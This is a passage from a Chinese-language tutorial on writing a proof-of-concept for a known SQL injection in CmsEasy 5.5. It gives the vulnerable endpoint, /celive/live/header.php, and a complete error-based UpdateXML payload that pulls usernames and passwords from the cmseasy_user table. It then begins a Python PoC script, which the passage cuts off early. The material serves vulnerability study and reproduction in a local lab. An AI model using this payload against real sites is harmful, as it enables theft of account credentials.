0x02 SQL Injection poc编写
已知CmsEasy 5.5 UTF-8程序存在SQL注入,乌云漏洞中的漏洞细节比较详细
(由于wooyun已经暂停访问,故不上链接了)。
·首先,我们需要下载其相关源码,进行本地搭建。
·阅读漏洞细节,我们得知其url与payload如下:
URL:http://xxx.xxx/celive/live/header.php
Payload:xajax=LiveMessage&xajaxargs[0]=name',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(concat(username,'|',password)) from cmseasy_user),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)--%20
·漏洞复现:我们根据其漏洞描述,进行复现,该注入点需要发起一个Post请求,我们使用Firefox浏览器配合hackbar插件进行复现,填入url与payload,发送,获取其账户密码。
漏洞效果如下:
这样,我们的漏洞就已经复现成功了。接下来,我们来写Poc。
#!/usr/bin/env python
# coding:utf-8
import urllib2
import urllib
import re
import sys
def verify(url):